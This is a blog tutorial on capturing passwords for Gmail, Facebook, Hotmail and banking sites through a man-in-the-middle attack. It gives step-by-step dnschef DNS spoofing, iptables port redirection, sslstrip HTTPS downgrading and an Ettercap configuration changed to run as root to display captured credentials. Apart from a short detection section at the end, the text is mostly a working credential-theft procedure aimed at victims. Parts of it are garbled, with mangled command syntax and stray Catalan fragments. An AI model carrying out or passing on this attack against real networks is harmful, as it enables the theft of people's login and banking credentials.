Capture passwords on HTTPS (SSL) using DNS spoofing

Greetings everyone

** From the title you can pretty much guess what is this tutorial all about ! so let’s go ahead and dive in :)
First you need to have a tool called ” Dnschef ” Download it from : https://thesprawl.org/media/projects/dnschef-0.2.1.tar.gz
Ofcours we need to have : Dsniff and Ettercap and sslstrip, i suggest you use a pentest distro of your choice rather than installing sniffing/spoofing tools on your own.

root@ubuntu:~# cd dnschef-0.2.1
root@ubuntu:~/dnschef-0.2.1# ./dnschef.py
_                _          __
| | version 0.2  | |        / _|
__| |_ __  ___  ___| |__   ___| |_
/ _` | ‘_ \/ __|/ __| ‘_ \ / _ \  _|
| (_| | | | \__ \ (__| | | |  __/ |
\__,_|_| |_|___/\___|_| |_|\___|_|
iphelix@thesprawl.org

  • DNSChef started on interface: 127.0.0.1
  • Using the following nameservers: 8.8.8.8
  • No parameters were specified. Running in full proxy mode

Introduction

This is what we will attack an attack MIM (Man in the Middle) using DNS spoofing (impersonation DNS service) and capture SSL traffic, thereby passwords sites like Gmail, Facebook, Hotmail, banks.
Attack

To do this you need to modify the victim DNS
Introduction
First prepare the DNS service to do the impersonation. To do this we will use DNSChef will redirect some of the resolutions domain name to a specific IP.

dnschef.py python – interface = 192.168.1.7 – 192.168.1.7 = fakeip

– Interface: IP interface that will listen for DNS requests and that we will be introduced to computer previously victim.

– Fakeip: IP dnschef returned as resolution domain. If the victim is remote need to enter the public IP address of attacker.

– Truedomains: Domains solve your real IP (to see if it works without this option).

While we follow the network traffic re-directed client continues its normal course, so that the victim does not experience any ill-operation on the connection.

echo 1> / proc/sys/net/ipv4/ip_forward

iptables-t nat-A PREROUTING-p tcp – destination-port 80-j REDIRECT – to-port 10000

Also necessary in case of a remote attack, redirect ports 53 (DNS) and 80 (HTTP) on our router to the attacking machine.

To finish preparing the machine to be lacking attacking the SSL traffic (in this case focus on HTTPS) will clear text from the attacker to the victim and figures from the attacker to the legitimate server. We will do this by SSLStrip And its a option (all types of traffic).

./sslstrip.py

Now only other start capturing traffic and passwords. To do this we use ETTERCAP because we will have a very clear vision of the captured username and password. Unfortunately we need to change default settings Ettercap to make it modify the file / usr / local / etc / etter.conf I do the following changes:

Modify settings and ec_uid ec_gid.

[privs]

ec_uid = 0 #ec_uid = 65534 # nobody is the default

ec_gid = 0 #ec_gid = 65534 # nobody is the default

I des-comentar les línies corresponents a l’ús de ip_tables

#####################################

# redir_command_on/off

#####################################

# you must provide a valid script for your operating system in order to have

# the SSL dissection available

# note that the cleanup script is executed without enough privileges (because

# they are dropped on startup). so you have to either: provide a setuid program

# or set the ec_uid to 0, in order to be sure the cleanup script will be

# executed properly

# NOTE: this script is executed with an execve(), so you can’t use pipes or

# output redirection as if you were in a shell. We suggest you to make a script if

# you need those commands.

#—————

# Linux

#—————

# if you use ipchains:

#redir_command_on = “ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport”

#redir_command_off = “ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport”

# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”

Run Ettercap so that the packets appear only in text mode (T) without headers (q) through eth0 interface (I)

ettercap-T-q-i ” Your interface”.

With any luck in a few minutes to start running the password screen. If you need to stop the attack while running is quite convenient to redirect the output to a file Ettercap.
Detection

This type of attack can only be detected by the following methods:

Do not use HTTPS. The URL can see that using the https encryption protocol. This is possibly the easiest way to detect the attack.
Resolving domain IP anomaly: If we see that the ping command resolves the DNS server IP is not normal or even what is within our internal netwIntroductionork.
Changing network settings: Finally we check if the DNS settings can detect a change of this parameter does not fit within the structure of our network.
With traceroute would see a jump for the attacking host.

I hope you have enjoyed the tutorial.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s